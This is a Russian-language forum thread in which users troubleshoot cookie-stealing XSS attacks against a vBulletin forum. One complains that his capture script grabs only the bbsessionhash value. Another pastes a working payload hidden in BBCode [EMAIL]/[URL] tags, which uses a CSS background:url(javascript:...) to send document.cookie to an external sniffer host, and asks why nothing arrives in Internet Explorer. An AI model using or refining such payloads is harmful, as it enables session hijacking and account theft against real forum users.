Использовал следующее: http://video.antichat.net/file105.html Проверка отработала, алерт вылазит. Запускаю оснолвную процедуру..... после перехода на искомый сайт создается файл в котором поидее должны лежать куки, а там лежит только bbsessionhash= значение и больше ничего. Попробовал прям из формы ПМ, в заголовок вставил искомый код, в алерте выдает полные куки. При отработке скрипта - только сессионхэш. В чем может быть причина? на заплатку не похоже, иначе проверки бы не работали. Спасибо.
А у меня другая проблема ...уже говорил сегодня в другой теме ... короче вставляю сплойт в форуме .. HTML: [EMAIL=[URL=s as=`[email protected]]mailto:[email protected] ] sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)` алерт есть , сплойт не палиться но на сниффе пусто ...может я что нить не так сделал ? если да то буду блогодарен если подскажите...и еще я сижу под ИЕ! а не под оперой иль под файерфокс